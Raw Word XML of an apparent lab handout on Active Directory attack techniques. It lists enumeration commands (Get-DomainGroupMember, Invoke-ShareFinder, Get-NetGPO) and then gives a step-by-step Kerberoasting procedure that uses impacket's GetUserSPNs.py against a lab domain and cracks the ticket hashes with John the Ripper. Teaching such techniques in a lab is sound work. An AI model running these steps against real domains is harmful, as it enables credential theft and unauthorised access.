        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DomainGroupMember</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -Identity "Domain Admins" -Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20B0CAC6" w:rsidP="5E1249AA" w:rsidRDefault="20B0CAC6" w14:paraId="69A97A5A" w14:textId="6C2EFE03">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. Locate Shares in the Domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20B0CAC6" w:rsidP="5E1249AA" w:rsidRDefault="20B0CAC6" w14:paraId="46E7BA50" w14:textId="3AB08F66">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ShareFinder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="20B0CAC6" w:rsidP="5E1249AA" w:rsidRDefault="20B0CAC6" w14:paraId="5CE6F42F" w14:textId="3D361E8C">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e.g. GPO Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20B0CAC6" w:rsidP="5E1249AA" w:rsidRDefault="20B0CAC6" w14:paraId="5F84ADB5" w14:textId="6BA17D71">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NetGPO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="4FC78961" w14:paraId="21DAC261" w14:textId="04A13B11">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
        </w:rPr>
        <w:t>AD Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="5E1249AA" w:rsidRDefault="0AB20C1F" w14:paraId="5F39EC50" w14:textId="15C16570">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>On the Windows 10 Client, open AD Explorer (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Sys</w:t>
      </w:r>
      <w:r w:rsidR="00643845">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>ternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="4161764A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> in th</w:t>
      </w:r>
      <w:r w:rsidR="007A790E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="4161764A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> tools folder</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="5A6F2F11">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> Agree to the license if prompted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="0AB20C1F" w14:paraId="0B72E81B" w14:textId="68AFA265">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>Connect to the lab domain and explore the domain tree.</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="3B87E67A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DE3B4A8" w:rsidP="5E1249AA" w:rsidRDefault="4DE3B4A8" w14:paraId="3DE82D32" w14:textId="2018A4E8">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="387B13B3" wp14:editId="7816A06D">
            <wp:extent cx="3277057" cy="3677163"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2112424825" name="Picture 2112424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1249AA" w:rsidP="5E1249AA" w:rsidRDefault="5E1249AA" w14:paraId="209BFCF8" w14:textId="5971A099">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4DE3B4A8" w:rsidP="5E1249AA" w:rsidRDefault="4DE3B4A8" w14:paraId="3ABE70E5" w14:textId="28A26F77">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Explore the directory tree.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4DE3B4A8" w:rsidP="5E1249AA" w:rsidRDefault="4DE3B4A8" w14:paraId="28F2B70E" w14:textId="5FFD454F">
      <w:pPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A7DB13" wp14:editId="7BC655C3">
            <wp:extent cx="5943600" cy="2209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="667151202" name="Picture 667151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57E" w:rsidP="1E149EC1" w:rsidRDefault="009D457E" w14:paraId="3E1F19F0" w14:textId="391D8D5D">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="796F9FFE" w:rsidP="082FBA6D" w:rsidRDefault="796F9FFE" w14:paraId="2EA2EC04" w14:textId="62892B52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="796F9FFE">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:r w:rsidRPr="082FBA6D" w:rsidR="796F9FFE">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and SPN’s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05DAF3AC" w:rsidP="5E1249AA" w:rsidRDefault="05DAF3AC" w14:paraId="48280AE4" w14:textId="4670F7D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2B3EDE61">
        <w:rPr/>
        <w:t xml:space="preserve">Change into the </w:t>
      </w:r>
      <w:r w:rsidR="2B3EDE61">
        <w:rPr/>
        <w:t>im</w:t>
      </w:r>
      <w:r w:rsidR="3848E744">
        <w:rPr/>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidR="2B3EDE61">
        <w:rPr/>
        <w:t>cket</w:t>
      </w:r>
      <w:r w:rsidR="2B3EDE61">
        <w:rPr/>
        <w:t xml:space="preserve"> directory and active the </w:t>
      </w:r>
      <w:r w:rsidR="2B3EDE61">
        <w:rPr/>
        <w:t>impacket</w:t>
      </w:r>
      <w:r w:rsidR="2B3EDE61">
        <w:rPr/>
        <w:t>-env virtual environment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05DAF3AC" w:rsidP="5E1249AA" w:rsidRDefault="05DAF3AC" w14:paraId="73112CB6" w14:textId="77E2E3B2">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="05DAF3AC" w:rsidP="5E1249AA" w:rsidRDefault="05DAF3AC" w14:paraId="4E7EFC24" w14:textId="7968B8B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-env/bin/active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="05DAF3AC" w:rsidP="5E1249AA" w:rsidRDefault="05DAF3AC" w14:paraId="06154A28" w14:textId="69DA8E08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>You should now see “(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:t xml:space="preserve">-env)” next to terminal prompt. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7C00C3D3" w:rsidP="5E1249AA" w:rsidRDefault="7C00C3D3" w14:paraId="603251FF" w14:textId="71DDADC8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>Query for service accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="5D8D99A9">
        <w:t>. Enter password for student when prompted</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7C00C3D3" w:rsidP="5E1249AA" w:rsidRDefault="7C00C3D3" w14:paraId="3BCBFE47" w14:textId="24A757C6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python3 /impacket/examples/GetUserSPNs.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="09D11D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zion.lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="09D11D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/student -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="09D11D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="09D11D43">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09D11D43" w:rsidP="5E1249AA" w:rsidRDefault="09D11D43" w14:paraId="4AB0F27F" w14:textId="05F83E2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>Request a service ticket for the service accounts</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="43042C4A">
        <w:t>. Enter password for student when prompted:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09D11D43" w:rsidP="5E1249AA" w:rsidRDefault="09D11D43" w14:paraId="7516D1BD" w14:textId="4D37E4D0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python3 /impacket/examples/GetUserSPNs.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zion.lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/student -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.4 -request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BBD1C00" w:rsidP="5E1249AA" w:rsidRDefault="3BBD1C00" w14:paraId="3F399E08" w14:textId="6D8F1714">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>Save the TGS KRB hashes to a file. Enter password for student when prompted:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09D11D43" w:rsidP="5E1249AA" w:rsidRDefault="09D11D43" w14:paraId="746666B3" w14:textId="4B3EE865">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Python3 /impacket/examples/GetUserSPNs.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zion.lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/student -dc-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.4</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6D902407">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; ~</w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="0F5F1CE1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/tgs.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="64E70F28" w:rsidP="5E1249AA" w:rsidRDefault="64E70F28" w14:paraId="1B97900F" w14:textId="73AB85C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t xml:space="preserve">Change to the </w:t>
      </w:r>
      <w:r w:rsidRPr="5E1249AA" w:rsidR="6A7425DC">
        <w:t>home directory and run John the ripper using a word list against the TGS hashes in the tgs.txt file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2AABAAF0" w:rsidP="5E1249AA" w:rsidRDefault="2AABAAF0" w14:paraId="2B0F04ED" w14:textId="5F1844DB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>john --wordlist=./wordlist.txt --format=krb5tgs tgs.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="628ACB71" w:rsidP="5E1249AA" w:rsidRDefault="628ACB71" w14:paraId="1B8D3369" w14:textId="72B55FB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:t>Verify the passwords with the “Show” switch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="628ACB71" w:rsidP="5E1249AA" w:rsidRDefault="628ACB71" w14:paraId="394197EC" w14:textId="4E12862D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
        <w:spacing w:before="240" w:after="158" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5E1249AA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>john --show --format=krb5tgs tgs.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D457E" w:rsidP="1E149EC1" w:rsidRDefault="040FE182" w14:paraId="78FA9B77" w14:textId="34D2FCB8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
